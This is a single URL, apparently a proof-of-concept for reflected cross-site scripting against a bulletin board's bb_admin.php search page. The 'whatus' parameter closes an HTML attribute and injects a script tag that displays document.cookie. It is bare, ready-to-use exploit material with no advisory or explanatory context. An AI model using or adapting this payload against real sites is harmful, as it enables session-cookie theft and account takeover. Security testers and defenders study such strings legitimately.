http://www.example.com/bb_admin.php?action=searchusers2&whatus=" /> <script>alert(document.cookie)</script>&searchus=id